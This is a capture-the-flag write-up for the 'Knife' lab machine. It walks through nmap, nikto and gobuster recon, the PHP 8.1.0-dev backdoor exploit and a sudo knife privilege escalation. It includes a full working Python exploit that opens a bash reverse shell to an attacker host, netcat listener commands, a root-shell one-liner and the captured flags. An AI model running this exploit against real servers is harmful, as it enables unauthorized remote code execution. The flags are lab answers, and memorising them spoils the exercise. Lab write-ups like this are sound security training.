Knife

TARGET IP: 10.10.10.242

HOST IP: 10.10.16.3

RECON

WEBSITE

http://[TARGET IP]

• The page seems like a typical medical page. The source code for the page doesn't have anything to note except for some javascript that takes care of the styling when you first log into the page.

• I'll also note that there are no links on this page or noted in the source code. Other than third-party links.

• Looks like we have a lot of good information from Wappalyzer.

  • Apache Web Server V2.4.41

  • Backend --> PHP v8.1.0

    • This is the route we need to go with. It doesn't have it here but the version is v8.1.0dev

  • OS --> Ubuntu

• After a quick google search, it appears that the Apache Web server has several vulnerabilities. Metasploit might even have a module to exploit it.

• From the Gobuster Scan below, I found a /index.php page.

  • This is just the same home page.

NMAP

nmap [TARGET IP]

nmap [TARGET IP] -A -p 22,80

• We can confirm that the Apache web Server is using V2.4.41

sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80

NIKTO

• First time using nikto here and interesting tool.

nikto 10.10.10.242

• This shows that the PHP version used is 8.1.0-dev

  • A quick google search shows that this is a development version of PHP and has a major vulnerability.

ENUMERATION

GOBUSTER

gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt -x php

gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt

EXPLOITATION

• Let's dive into possible exploitations for the Apache version.

  • The Apache website actually has a list of all vulnerabilities which is really handy.

  • Nothing sticks out specifically for this version but it looks like the version may still be susceptible to multiple attacks.

  • I'm pretty sure this is not the route to go.

• Let's take a look

METASPLOIT

• Tried a few exploits available but nothing really stuck.

• No luck here with Apache.

PHP

• From the Nikto scan I found that the PHP version is 8.1.0-dev which has a major vulnerability that allows for a backdoor into the server.

• I found a really useful python script that creates a reverse shell using this backdoor.

# Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link: 
#     - https://hub.docker.com/r/phpdaily/php
#     - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# CVE : N/A
# References:
#     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.

Usage:
  python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port>
"""

#!/usr/bin/env python3
import os, sys, argparse, requests

request = requests.Session()

def check_target(args):
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False

def reverse_shell(args):
    payload = 'bash -c \"bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\"'
    injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)

def main(): 
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp <attacker PORT>")
    parser.add_argument("url", metavar='<target URL>', help="Target URL")
    parser.add_argument("lhost", metavar='<attacker IP>', help="Attacker listening IP",)
    parser.add_argument("lport", metavar='<attacker PORT>', help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        exit
    
if __name__ == "__main__":
    main()

• I created a new file with the code snippet above and ran the following.

nc -lvnp 4444

python3 exploit.py http://[TARGET IP] [HOST IP] 4444

• Return back to your netcat listener and you should now have access to the system.

• Here is the user flag.

58a976dbd2240852f6910cab079cc7df

PRIVILEGE ESCALATION

• Start with allowable sudo privileges.

sudo -l

• Let's go check out GTFOBins for a possible route to escalation.

sudo knife exec -E 'exec "/bin/sh"'

cat /root/root.txt

c0a6dfc2f007265b4eafecf32efebab9